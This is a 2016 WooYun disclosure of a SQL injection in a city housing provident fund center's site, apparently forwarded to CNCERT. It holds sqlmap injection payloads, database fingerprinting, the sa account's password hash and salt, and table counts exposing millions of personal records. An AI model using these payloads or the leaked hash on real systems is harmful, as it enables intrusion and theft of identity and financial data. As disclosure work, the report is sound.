当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191218

漏洞标题:某市住房公积金管理中心注入漏洞(SA)涉及700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)

相关厂商:某市住房公积金管理中心

漏洞作者: 路人甲

提交时间:2016-04-01 00:00

修复时间:2016-05-20 18:40

公开时间:2016-05-20 18:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-01: 细节已通知厂商并且等待厂商处理中
2016-04-05: 厂商已经确认,细节仅向厂商公开
2016-04-15: 细节向核心白帽子及相关领域专家公开
2016-04-25: 细节向普通白帽子公开
2016-05-05: 细节向实习白帽子公开
2016-05-20: 细节向公众公开

简要描述:

如题、、、

详细说明:

某市住房公积金管理中心注入漏洞(SA),泄露700W+账户记录加58W+公积金信息(名字/金额/身份证/公司等信息)。。。
注入点:http://**.**.**.**/List/DownLoadCenterDetails?id=5EBC88CC-A248-41FD-9703-7FD6CC454628 用神器SQLMAP 跑了一下发现SA权限、、、直接可以跑出大量敏感的信息,包括公积金金额、居民身份证、名字、所在单位公司名字等等信息。。。
+-----------------------------------------+---------+
| Table | Entries |
+-----------------------------------------+---------+
| dbo.Fq_PersonAccountDetails | 7130445 |
| dbo.Fq_LoanDetails | 889789 |
| dbo.Fq_FundAccountsInfo | 580320 |
| dbo.Im_PFAccountContrast | 575657 |

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525' AND 9621=9621 AND 'EhJf'='
EhJf
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=225028E4-CA12-4EF0-9AD9-F817F3539525' WAITFOR DELAY '0:0:5'--
---
[07:57:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2005
available databases [7]:
[*] AdventureWorks
[*] AdventureWorksDW
[*] GIOT_QZgjj
[*] master
[*] model
[*] msdb
[*] tempdb
current database: 'GIOT_QZgjj'
current user: 'sa'
database management system users password hashes:
[*] sa [1]:
password hash: 0x01004086ceb659f0af51ae621f0e86391ef163ba496c273d29ec
header: 0x0100
salt: 4086ceb6
mixedcase: 59f0af51ae621f0e86391ef163ba496c273d29ec
[09:10:38] [INFO] testing if current user is DBA
database management system users privileges:
[*] sa (administrator)
Database: GIOT_QZgjj
[88 tables]
+-------------------------------------+
| Bi_Company |
| Bi_CompanySort |
| Bi_Department |
| Bi_DicType |
| Bi_DicValue |
| Bi_EmployeeInfo |
| Bi_NotWorkDay |
| Bi_Position |
| Cp_OverviewManagement |
| Cp_ProvidentFundCard |
| Cs_LendingRates |
| Cs_LendingYearRates |
| Fq_AccountsSMS |
| Fq_CompanyAccountsInfo |
| Fq_CompanyAcountsInfoPro |
| Fq_FundAccountsInfo |
| Fq_FundAccountsInfoPro |
| Fq_LoanAccount |
| Fq_LoanAccountContrast_V |
| Fq_LoanAccountPro |
| Fq_LoanAccountProNew_V |
| Fq_LoanAccountProNo_V |
| Fq_LoanBank |
| Fq_LoanDetailSMS |
| Fq_LoanDetails |
| Fq_LoanDetailsPro |
| Fq_LoanHandleProgress |
| Fq_LoanHandleProgressPro |
| Fq_ManagementDept |
| Fq_PFPersonAccountProNo_V |
| Fq_PersonAccountDetails |
| Fq_PersonAccountDetailsPro |
| Fq_PersonAccountNew_V |
| Fq_WhichLinks |
| Ic_ComplaintsRights |
| Ic_ConsultingInteractive |
| Ic_ReplyQuestion |
| Im_AnnouncementPublicity |
| Im_CanGoodsProperty |
| Im_CategoryManagement |
| Im_CustomerInfo |
| Im_DownloadCenter |
| Im_Floatage |
| Im_FundCreditBlacklist |
| Im_GovernmentInformationDisclosure |
| Im_LawGuide |
| Im_Links |
| Im_PFAccountContrast |
| Im_PaymentHandlingProgressPublicity |
| Im_PoliciesRegulations |
| Im_RotationDiagram |
| Im_SearchKeywords |
| Im_SpecialTopic |
| Im_VerificationManage |
| Im_WorkDynamics |
| Pf_AccountContrast_V |
| Rs_HomeServiceReservationManage |
| Rs_ReservationManage |
| Rs_ReservationManageDepartment |
| Rs_ReservationNumberLimit |
| Rs_SMSTemplates |
| Sa_ControlInfo |
| Sa_LoginControl |
| Sa_ParameterConfiguration |
| Sa_Privilege_Company_Handle |
| Sa_UpdateLog |
| Sa_UserInfo |
| Sh_ComCustomerInfo |
| Sh_Persom |
| Sh_PersonChangePayListDetail |
| Sh_PersonFundChangeDetail |
| Sh_Settings |
| bo.Sh_PersonFundChange |
| sa_LogError |
| sa_LogHandle |
| sa_LogHandle_Report |
| sa_LogLoa |
| sa_LogLogin_Report |
| sa_Menu_Handle_Tree_View |
| sa_OnLiner |
| sa_Role_User |
| sa_Role_User_v |
| sa_handle_Guid |
| sa_menu_Guid |
| sa_privilege_Handle |
| sa_privilege_Handle_v |
| sa_role |
| sa_user_menu |
+-------------------------------------+


2.png


3.png


4.png


5.png


漏洞证明:

具体的跑出的数据如下:

Database: GIOT_QZgjj
+-----------------------------------------+---------+
| Table | Entries |
+-----------------------------------------+---------+
| dbo.Fq_PersonAccountDetails | 7130445 |
| dbo.Fq_LoanDetails | 889789 |
| dbo.Fq_FundAccountsInfo | 580320 |
| dbo.Im_PFAccountContrast | 575657 |
| dbo.Im_VerificationManage | 273258 |
| dbo.Fq_AccountsSMS | 209707 |
| dbo.Pf_AccountContrast_V | 120413 |
| dbo.Fq_LoanHandleProgress | 97543 |
| dbo.Im_CustomerInfo | 63783 |
| dbo.Fq_LoanAccount | 60268 |
| dbo.Fq_LoanDetailSMS | 55956 |
| dbo.Fq_LoanAccountContrast_V | 22150 |
| dbo.Fq_LoanDetailsPro | 4200 |
| dbo.Ic_ConsultingInteractive | 1714 |
| dbo.Sa_LoginControl | 1160 |
| dbo.sa_OnLiner | 475 |
| dbo.sa_privilege_Handle | 438 |
| dbo.sa_privilege_Handle_v | 438 |
| dbo.Ic_ReplyQuestion | 330 |
| dbo.Im_SpecialTopic | 321 |
| dbo.sa_Menu_Handle_Tree_View | 287 |
| dbo.Im_WorkDynamics | 285 |
| dbo.sa_LogError | 252 |
| dbo.sa_handle_Guid | 202 |
| dbo.sa_LogHandle | 116 |
| dbo.Im_AnnouncementPublicity | 114 |
| dbo.Im_CanGoodsProperty | 105 |
| dbo.sa_menu_Guid | 85 |
| dbo.Ic_ComplaintsRights | 84 |
| dbo.Im_PoliciesRegulations | 74 |
| dbo.Im_CategoryManagement | 65 |
| dbo.Sh_Settings | 52 |
| dbo.Rs_ReservationManage | 50 |
| dbo.Im_LawGuide | 45 |
| dbo.Fq_LoanBank | 34 |
| dbo.Im_DownloadCenter | 25 |
| dbo.Im_GovernmentInformationDisclosure | 19 |
| dbo.Cp_ProvidentFundCard | 14 |
| dbo.Fq_ManagementDept | 13 |
| dbo.Im_PaymentHandlingProgressPublicity | 13 |
| dbo.sa_LogLogin_Report | 12 |
| dbo.Sa_UserInfo | 12 |
| dbo.Rs_HomeServiceReservationManage | 11 |
| dbo.Rs_ReservationManageDepartment | 11 |
| dbo.Bi_EmployeeInfo | 10 |
| dbo.Im_RotationDiagram | 10 |
| dbo.Rs_ReservationNumberLimit | 10 |
| dbo.sa_Role_User | 10 |
| dbo.sa_Role_User_v | 10 |
| dbo.Im_Links | 9 |
| dbo.Fq_WhichLinks | 8 |
| dbo.Rs_SMSTemplates | 7 |
| dbo.Sa_ControlInfo | 7 |
| dbo.Sa_Privilege_Company_Handle | 7 |
| dbo.Sa_ParameterConfiguration | 6 |
| dbo.Im_SearchKeywords | 4 |
| dbo.sa_LogHandle_Report | 4 |
| dbo.Bi_Company | 3 |
| dbo.Bi_Department | 3 |
| dbo.Bi_DicType | 3 |
| dbo.Bi_DicValue | 3 |
| dbo.Cp_OverviewManagement | 3 |
| dbo.Bi_CompanySort | 2 |
| dbo.Cs_LendingYearRates | 2 |
| dbo.sa_role | 2 |
| dbo.Sh_ComCustomerInfo | 2 |
| dbo.Sh_PersonChangePayListDetail | 2 |
| dbo.Bi_NotWorkDay | 1 |
| dbo.Cs_LendingRates | 1 |
| dbo.Im_Floatage | 1 |
+-----------------------------------------+---------+


5.png


6.png


7.png


修复方案:

过滤吧、、、

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-05 18:31

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给福建分中心,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评价